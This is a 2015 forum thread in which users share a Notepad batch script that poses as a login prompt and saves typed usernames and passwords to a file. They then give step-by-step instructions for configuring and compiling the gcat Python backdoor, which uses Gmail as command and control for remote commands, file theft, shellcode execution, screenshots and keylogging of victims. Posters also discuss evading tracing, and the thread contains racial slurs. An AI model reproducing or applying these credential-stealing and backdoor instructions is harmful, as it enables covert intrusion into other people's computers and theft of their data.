User Controls
Simple Keylogger With Notepad
-
2015-07-15 at 1:01 AM UTCThe following is to be used for research purposes only, and I take no responsibility for anything done with malicious intent.
Alright, we're just going to use Notepad to make a simple .bat (Batch) file, keylogger.
Start by opening Notepad, then pasting in the following code:
@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit
Make a folder on your desktop called "Logs". It must be logs or it will not work.
Drag that folder into C:\
Now run a test of your "Logger.bat".
Once tested, go back to the "Logs" folder in C:\ and there will be a .txt file. If a second entry is made, the .txt will overwrite itself.
Enjoy! -
2015-07-19 at 2:58 AM UTCIf you change the word after C:in line 8 to something different, can you name the folder on your desktop that same name?
forgive the dumb question, I suck at computers. -
2015-07-19 at 3:38 AM UTCI no use Windows.
-
2015-07-19 at 5:31 PM UTC
If you change the word after C:in line 8 to something different, can you name the folder on your desktop that same name?
forgive the dumb question, I suck at computers.
You could try. I haven't done it considering I only use mine for saving passwords because I have to change them constantly.
-
2015-07-19 at 5:32 PM UTCwhy not just use keepass x or something?
-
2015-07-19 at 7:18 PM UTC
why not just use keepass x or something?
Because I don't want to. I like the keylogger because it requires an effort on my part. -
2015-07-20 at 2:38 AM UTCVery nifty little trick. How much does the program interfere as the user goes about their buisness? Or more concisely how much effort would an unsuspecting user need to put into noticing the program to find it? let's assume the logs file has been moved to a deep system folder rather than the desktop to circumvent that issue.
-
2015-07-20 at 3:05 AM UTC
Very nifty little trick. How much does the program interfere as the user goes about their buisness? Or more concisely how much effort would an unsuspecting user need to put into noticing the program to find it? let's assume the logs file has been moved to a deep system folder rather than the desktop to circumvent that issue.
It doesn't stay on the desktop. That folder gets moved to a system folder. SO unless they check it, they would have no clue, BUT the .bat would need to be executed remotely without their knowledge to allow the logging to start.
*Recheck my post. The folder gets drug into the C:\* -
2015-07-20 at 3:49 PM UTCYes but what ya'll niggers are forgetting is that if you don't have your keylogger contact a remote host to send everything it logs your program is basically useless, no offense.
Here's something more useful.
Backdoor with keylogger for windows.
https://github.com/byt3bl33d3r/gcat/...ter/implant.py
And your controller.
https://github.com/byt3bl33d3r/gcat/blob/master/gcat.py
You'll need python of courrse and these libs: (They have to be installed)
http://sourceforge.net/projects/pywin32/
http://sourceforge.net/projects/pyhook/
You'll also need to go into your python folder and find pip.exe to install that module so you can screencap your victim's desktop.
EDIT: Forgot to mention that you need to run pyhton pip.exe install pillow to get the module installed that you need.
You're going to have to setup a gmail as command and control server and have to tell the program where to send and recieve commands from you do that by changing the following variables:
#######################################
gmail_user = 'example@gmail.com'
gmail_pwd = 'password'
server = "smtp.gmail.com"
server_port = 587
#######################################
Change variable gmail_user to equal the adress you set up. Change variable gmail_pwd to equal the password you created for that account.
You're going to have to compile implant.py with py2exe.
http://sourceforge.net/projects/py2exe/
Your controller gcat you can just run from the command line.
Lanny was kind enough to hook me up with a script to help compile implant.py. Open up your favorite text editor and enter the following code and save it as setup.py
try:
# py2exe 0.6.4 introduced a replacement modulefinder.
# This means we have to add package paths there, not to the built-in
# one. If this new modulefinder gets integrated into Python, then
# we might be able to revert this some day.
# if this doesn't work, try import modulefinder
try:
import py2exe.mf as modulefinder
except ImportError:
import modulefinder
import win32com, sys
for p in win32com.__path__[1:]:
modulefinder.AddPackagePath("win32com", p)
for extra in ["win32com.shell"]: #,"win32com.mapi"
__import__(extra)
m = sys.modules[extra]
for p in m.__path__[1:]:
modulefinder.AddPackagePath(extra, p)
except ImportError:
# no build path setup, no worries.
pass
from distutils.core import setup
import py2exe
setup(console=["implant.py"], options={"py2exe": {"packages": ["email"]}})
When that's done open up a command prompt and use the command cd to go to the directory where you have saved implant.py and setup.py and run the command: python setup.py py2exe, to compile. If you're smart you'll structure your command like this -> "python setup.py py2exe >> log.txt" then you can check what your terminal outputs in the dump log.txt to see if everything went well.
Note: You may want to use https://github.com/pyinstaller/pyinstaller instead of py2exe because py2xe had some problems importing the email modules.
Major props to lanny for helping me out with this backdoor with gmal as C&C server <3. I was kind of excited so i thought i'd share, if you have any questions i'll try to answer them, it took me a bit and i am still fiddling with program but i do believe i got everything to work i am currently testing it's functionality. Also before i foget after you compile you're going to have some directories and implant.exe, you're going to have to get all of your dependencies in a single file it's a little more involved with py2.exe but with pyinstaller it's as simple as adding --onefile to the command line when compiling. Which is why you might want to opt for pyinstaller in general. -
2015-07-20 at 6:53 PM UTC
Yes but what ya'll niggers are forgetting is that if you don't have your keylogger contact a remote host to send everything it logs your program is basically useless, no offense.
Here's something more useful.
Backdoor with keylogger for windows.
https://github.com/byt3bl33d3r/gcat/...ter/implant.py
And your controller.
https://github.com/byt3bl33d3r/gcat/blob/master/gcat.py
You'll need python of courrse and these libs: (They have to be installed)
http://sourceforge.net/projects/pywin32/
http://sourceforge.net/projects/pyhook/
You'll also need to go into your python folder and find pip.exe to install that module so you can screencap your victim's desktop.
You're going to have to setup a gmail as command and control server and have to tell the program where to send and recieve commands from you do that by changing the following variables:
#######################################
gmail_user = 'example@gmail.com'
gmail_pwd = 'password'
server = "smtp.gmail.com"
server_port = 587
#######################################
Change variable gmail_user to equal the adress you set up. Change variable gmail_pwd to equal the password you created for that account.
You're going to have to compile implant.py with py2exe.
http://sourceforge.net/projects/py2exe/
Your controller gcat you can just run from the command line.
Lanny was kind enough to hook me up with a script to help compile implant.py. Open up your favorite text editor and enter the following code and save it as setup.py
try:
# py2exe 0.6.4 introduced a replacement modulefinder.
# This means we have to add package paths there, not to the built-in
# one. If this new modulefinder gets integrated into Python, then
# we might be able to revert this some day.
# if this doesn't work, try import modulefinder
try:
import py2exe.mf as modulefinder
except ImportError:
import modulefinder
import win32com, sys
for p in win32com.__path__[1:]:
modulefinder.AddPackagePath("win32com", p)
for extra in ["win32com.shell"]: #,"win32com.mapi"
__import__(extra)
m = sys.modules[extra]
for p in m.__path__[1:]:
modulefinder.AddPackagePath(extra, p)
except ImportError:
# no build path setup, no worries.
pass
from distutils.core import setup
import py2exe
setup(console=["implant.py"], options={"py2exe": {"packages": ["email"]}})
When that's done open up a command prompt and use the command cd to go to the directory where you have saved implant.py and setup.py and run the command: python setup.py py2exe, to compile. If you're smart you'll structure your command like this -> "python setup.py py2exe >> log.txt" then you can check what your terminal outputs in the dump log.txt to see if everything went well.
Note: You may want to use https://github.com/pyinstaller/pyinstaller instead of py2exe because py2xe had some problems importing the email modules.
Major props to lanny for helping me out with this backdoor with gmal as C&C server <3. I was kind of excited so i thought i'd share, if you have any questions i'll try to answer them, it took me a bit and i am still fiddling with program but i do believe i got everything to work i am currently testing it's functionality. Also before i foget after you compile you're going to have some directories and implant.exe, you're going to have to get all of your dependencies in a single file it's a little more involved with py2.exe but with pyinstaller it's as simple as adding –onefile to the command line when compiling. Which is why you might want to opt for pyinstaller in general.
Badass as always Soph. \m/ -
2015-07-20 at 7:15 PM UTCOne more thing, but this is going to probably sound absolutely crazy. Would it be possible to make it go to a Claws mail considering it's more anonymous than accessing a gmail? If we could make this as anonymous as possible and harder to trace through the emails, it'd be a lot better. Also, I have ideas about stuff we could integrate a Pi-rate box into, but I'm not sure how we'd go about it. We'll definitely have to bounce around some more ideas whenever we can.
-
2015-07-20 at 7:26 PM UTC
One more thing, but this is going to probably sound absolutely crazy. Would it be possible to make it go to a Claws mail considering it's more anonymous than accessing a gmail? If we could make this as anonymous as possible and harder to trace through the emails, it'd be a lot better. Also, I have ideas about stuff we could integrate a Pi-rate box into, but I'm not sure how we'd go about it. We'll definitely have to bounce around some more ideas whenever we can.
This script is pretty stealthy as far as command sending is concerned it is designed to be because we are using gmail as C&C. just send your commands through tor or a vpn and you should be safe also my nig, this is a backdoor it comes with these features if you include the modules right.- -cmd CMD Execute a system command
- -download PATH Download a file from a clients system
- -exec-shellcode FILE Execute supplied shellcode on a client
- -screenshot Take a screenshot
- -lock-screen Lock the clients screen
- -force-checkin Force a check in
- -start-keylogger Start keylogger
- -stop-keylogger Stop keylogger
-
2015-07-20 at 7:29 PM UTC
This script is pretty stealthy as far as command sending is concerned it is designed to be because we are using gmail as C&C. just send your commands through tor or a vpn and you should be safe also my nig, this is a backdoor it comes with these features if you include the modules right.
- -cmd CMD Execute a system command
- -download PATH Download a file from a clients system
- -exec-shellcode FILE Execute supplied shellcode on a client
- -screenshot Take a screenshot
- -lock-screen Lock the clients screen
- -force-checkin Force a check in
- -start-keylogger Start keylogger
- -stop-keylogger Stop keylogger
Ah. But if it came down to it, is it modifiable o mostly ANY email services? -
2015-07-20 at 7:55 PM UTC
Ah. But if it came down to it, is it modifiable o mostly ANY email services?
I think it should be if you get the server and SMTP port right. For google it's:
smtp.gmail.com
Port: 587
Dunno' about other services. -
2015-07-20 at 9:08 PM UTCUse the telnet command with appropriate switches.
-
2015-07-20 at 9:09 PM UTC
I think it should be if you get the server and SMTP port right. For google it's:
Alright, cool. If I want to change it and ever have an issue. I'll come to y'all for help.
smtp.gmail.com
Port: 587
Dunno' about other services. -
2015-07-20 at 9:40 PM UTCSure thing i'll try to helpt where i can.
-
2015-07-21 at 2:24 AM UTCForgot to mention that you need to run pyhton pip.exe install pillow to get the module installed that you need. Added it to my original post for clarification.
-
2015-07-21 at 2:35 AM UTC
Forgot to mention that you need to run pyhton pip.exe install pillow to get the module installed that you need. Added it to my original post for clarification.
Erm, send it in the .rar? It'd make it easier. I'm really baked and need as much help as possible. XD -
2015-07-21 at 2:53 AM UTC
Erm, send it in the .rar? It'd make it easier. I'm really baked and need as much help as possible. XD
It comes with your python install, go to open a command line and CD to C:\Python27\Scripts then run 'python pip2.7.exe install pillow'. I was having some trouble getting the screenshotting feauture to function in my VM though but i'm trying to work it out, i sent Lanny my logs as well to see if he can lend a hand. He's the python pro here lol :)
We'll keep in touch and i'll let you know if i am able to get to to work properly.